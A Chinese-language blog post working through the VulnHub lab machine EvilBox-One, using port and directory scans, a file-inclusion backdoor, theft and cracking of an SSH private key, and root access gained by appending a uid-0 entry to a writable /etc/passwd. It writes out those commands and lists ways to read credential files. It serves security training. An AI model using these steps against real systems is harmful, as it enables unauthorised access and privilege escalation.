vulnhub6

本贴最后更新于 394 天前,其中的信息可能已经时移世改

靶机地址:https://download.vulnhub.com/evilbox/EvilBox---One.ova

准备工作

可以先安装 kali 的字典:

sudo apt install seclists

或者直接输入 seclists​,系统会问你是否安装,输入 y 即可自动安装

image

默认路径就是在 /usr/share/wordlists​里面各类的字典非常多

image

gobuster​的安装同理

信息收集

nmap 探测端口开放信息

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap --min-rate 10000 -p- 192.168.142.129
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 11:12 CST
Nmap scan report for 192.168.142.129
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B5:81:B9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds

nmap 探测开放端口的详细信息以及操作系统等信息

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap -sV -sT -O -p 22,80 192.168.142.129 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 11:12 CST
Nmap scan report for 192.168.142.129
Host is up (0.00022s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:B5:81:B9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds

fscan 扫描

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ ./fscan_amd64 -h 192.168.142.129

   ___                              _  
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <  
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.142.129 is alive
[*] Icmp alive hosts len is: 1
192.168.142.129:22 open
192.168.142.129:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://192.168.142.129    code:200 len:10701  title:Apache2 Debian Default Page: It works

只有一个 80 是可利用的,所以就直接访问扫目录了

┌──(kali㉿kali)-[/usr/share/wordlists/dirbuster]
└─$ gobuster dir -u http://192.168.142.129/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,asp,jsp,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.142.129/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,asp,jsp,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 319] [--> http://192.168.142.129/secret/]                                                        
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/server-status        (Status: 403) [Size: 280]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

扫出来三个

/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 319] [--> http://192.168.142.129/secret/]  

index.html 是默认页面

robots.txt 的内容:

image

可以先记录,万一是后面需要用到的用户名或者密码

接下来就是二层目录爆破/secret 了

image

扫出一个 evil.php,像是后门文件,没有回显,需要爆破参数

还得猜一下后门类型(eval,system,include)

eval 参数爆破

image

无结果

image

system 参数爆破

image

无结果

image

include 参数爆破

image

成功爆破出 command

image

任意文件读取思路:

1.可以读取/etc/passwd或者知道用户名的前提下,可以看用户目录的历史命令
2.可以看一下/root/.ssh/id_rsa或者/home/user/.ssh/id_rsa查看私钥 公钥文件`authorized_keys`
3.使用php伪协议写文件:
* 写文件:php://filter/write.base64-decode/resource=文件名&txt=写入内容的base64编码
* 如果写入成功的话可以直接查看,否则不成功
4日志包含getshell.
5.filterchains php gen

使用如下命令查看 ssh 登录的相关信息:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh mowree@192.168.142.129 -v

image

发现允许公钥和密码登入,发现只有第二种方法是行得通的

ssh 中密钥和公钥的配置文件路径:

公钥: .ssh/authorized_keys
私钥: .ssh/id_rsa

这里有两种思路去读取:

1.读取 root 的,直接抵达目的(大多情况下权限不够)

2.直接读取用户的配置文件,一般下权限都是足够的

这里只能读取用户的,私钥:

image

公钥:

image

写入自己的 ssh 文件,然后

但是这里无法直接拿着密钥去登录 ssh 还是需要密码,有两种可能:

1.服务器未开启私钥登录的配置
2.在设置私钥的时候配置了私钥的密码(passphrase)所以在登录的时候还是需要输入密码

getshell

所以下一步就是需要爆破设置的密钥是配置了什么密码,利用 kali 自带的 john 工具

但是这个工具对爆破的内容格式要求比较严格,我们需要使用脚本把格式弄成我们需要的格式,脚本文件位置:/usr/share/john/ssh2john.py

image

利用此脚本:

python ssh2john.py /root/.ssh/id_rsa > /root/.ssh/hash

然后就可以利用 john 爆破了

image

密码就是 unicorn

这里登录之前记得赋予 id_rsa 以 600 的权限

chmod 600 id_rsa

使用私钥登入即可

image

权限提升

suid 提权:

mowree@EvilBoxOne:/tmp$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su

无可利用的 suid

找内核漏洞:

 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 2   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 3   exploit/linux/local/vmwgfx_fd_priv_esc                              Yes                      The target appears to be vulnerable. vmwgfx installed

三个可能可以利用的,但是没有一个打的通的

查找可写的文件

find / writable 2>/dev/null | grep -v run | grep -v proc | grep -v sys | grep -v var | grep -v usr | grep -v /dev | grep -v apache2 | grep -v ssl

image

发现/etc/passwd 文件可写,利用写入新账户提权

mowree@EvilBoxOne:/tmp$ echo 'root2:$1$u1UR7D3z$Zp7IvFndtV5XH/tYozXi6.:0:0:root:/root:/bin/sh' >> /etc/passwd
mowree@EvilBoxOne:/tmp$ su root2
Contraseña: 
id
su: Fallo de autenticación
mowree@EvilBoxOne:/tmp$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:/tmp$ su root2
Contraseña: 
# id
uid=0(root) gid=0(root) grupos=0(root)

image

  • 安全

    安全永远都不是一个小问题。

    200 引用 • 816 回帖

相关帖子

回帖

欢迎来到这里!

我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。

注册 关于
请输入回帖内容 ...